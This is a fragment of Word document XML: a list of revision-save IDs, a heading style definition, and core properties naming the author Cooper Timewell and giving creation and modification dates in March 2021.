    <w:rsid w:val="001B090B"/>
    <w:rsid w:val="001B7E7E"/>
    <w:rsid w:val="001F2B7B"/>
    <w:rsid w:val="001F4835"/>
    <w:rsid w:val="002225F7"/>
    <w:rsid w:val="00247E56"/>
    <w:rsid w:val="00283F0D"/>
    <w:rsid w:val="002B4B37"/>
    <w:rsid w:val="002E69F0"/>
    <w:rsid w:val="003019B0"/>
    <w:rsid w:val="003053DA"/>
    <w:rsid w:val="003200E4"/>
    <w:rsid w:val="00322F3C"/>
    <w:rsid w:val="00330968"/>
    <w:rsid w:val="00345930"/>
    <w:rsid w:val="00410C3D"/>
    <w:rsid w:val="00426FAE"/>
    <w:rsid w:val="004308DB"/>
    <w:rsid w:val="0043348C"/>
    <w:rsid w:val="00465E5F"/>
    <w:rsid w:val="004744C7"/>
    <w:rsid w:val="00494DC8"/>
    <w:rsid w:val="004A1948"/>
    <w:rsid w:val="004B4C8A"/>
    <w:rsid w:val="0052546F"/>
    <w:rsid w:val="00530835"/>
    <w:rsid w:val="0054682B"/>
    <w:rsid w:val="00570FD0"/>
    <w:rsid w:val="00571F31"/>
    <w:rsid w:val="00593BBF"/>
    <w:rsid w:val="005E531B"/>
    <w:rsid w:val="005F35A7"/>
    <w:rsid w:val="00611A7A"/>
    <w:rsid w:val="006200B7"/>
    <w:rsid w:val="00653CA0"/>
    <w:rsid w:val="00662DD4"/>
    <w:rsid w:val="00737133"/>
    <w:rsid w:val="00742634"/>
    <w:rsid w:val="00747FFA"/>
    <w:rsid w:val="0075452C"/>
    <w:rsid w:val="007951F1"/>
    <w:rsid w:val="007A3F83"/>
    <w:rsid w:val="007E0C53"/>
    <w:rsid w:val="0080469A"/>
    <w:rsid w:val="00821186"/>
    <w:rsid w:val="00834EF4"/>
    <w:rsid w:val="008369D7"/>
    <w:rsid w:val="00843766"/>
    <w:rsid w:val="00855AF3"/>
    <w:rsid w:val="00880926"/>
    <w:rsid w:val="008C0C7D"/>
    <w:rsid w:val="008C44BA"/>
    <w:rsid w:val="008D26BF"/>
    <w:rsid w:val="00925D67"/>
    <w:rsid w:val="0093546D"/>
    <w:rsid w:val="00950541"/>
    <w:rsid w:val="00971939"/>
    <w:rsid w:val="00992427"/>
    <w:rsid w:val="009D2524"/>
    <w:rsid w:val="009D7856"/>
    <w:rsid w:val="00A011E2"/>
    <w:rsid w:val="00A818FB"/>
    <w:rsid w:val="00A90762"/>
    <w:rsid w:val="00B06EF1"/>
    <w:rsid w:val="00B42357"/>
    <w:rsid w:val="00B43CE5"/>
    <w:rsid w:val="00B52CE0"/>
    <w:rsid w:val="00B619EE"/>
    <w:rsid w:val="00B62B9F"/>
    <w:rsid w:val="00B820B7"/>
    <w:rsid w:val="00BB1719"/>
    <w:rsid w:val="00BB595D"/>
    <w:rsid w:val="00BC0097"/>
    <w:rsid w:val="00C3791B"/>
    <w:rsid w:val="00C5071C"/>
    <w:rsid w:val="00C8246F"/>
    <w:rsid w:val="00C93211"/>
    <w:rsid w:val="00CB0A5D"/>
    <w:rsid w:val="00CD06EB"/>
    <w:rsid w:val="00CF6C26"/>
    <w:rsid w:val="00D309A8"/>
    <w:rsid w:val="00D50B21"/>
    <w:rsid w:val="00D51CFD"/>
    <w:rsid w:val="00D534CF"/>
    <w:rsid w:val="00D96906"/>
    <w:rsid w:val="00DA32D5"/>
    <w:rsid w:val="00DA6E57"/>
    <w:rsid w:val="00DC3C26"/>
    <w:rsid w:val="00DD7D71"/>
    <w:rsid w:val="00DF2008"/>
    <w:rsid w:val="00E06F31"/>
    <w:rsid w:val="00E4236E"/>
    <w:rsid w:val="00E54E5A"/>
    <w:rsid w:val="00E64CC4"/>
    <w:rsid w:val="00E65277"/>
    <w:rsid w:val="00ED3568"/>
    <w:rsid w:val="00EE0E57"/>
    <w:rsid w:val="00EE5488"/>
    <w:rsid w:val="00EF24A4"/>
    <w:rsid w:val="00EF51A6"/>
    <w:rsid w:val="00EF6C1D"/>
    <w:rsid w:val="00F16915"/>
    <w:rsid w:val="00F441A3"/>
    <w:rsid w:val="00F622D4"/>
    <w:rsid w:val="00F87FBB"/>
    <w:rsid w:val="00F96448"/>
    <w:rsid w:val="00FB502E"/>
    <w:rsid w:val="00FC598F"/>
    <w:rsid w:val="00FD2BB5"/>
    <w:rsid w:val="00FD5133"/>
    <w:rsid w:val="00FF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6686"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{51477900-0FD6-4D20-BEC4-86B0DA5E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A3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1A3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008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34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1A3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41A3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7E0C5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F2008"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F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F964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44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D534C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fuse.fabricorp.o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5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Timewell</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Cooper Timewell</cp:lastModifiedBy>
  <cp:revision>122</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-01T04:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-04T05:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>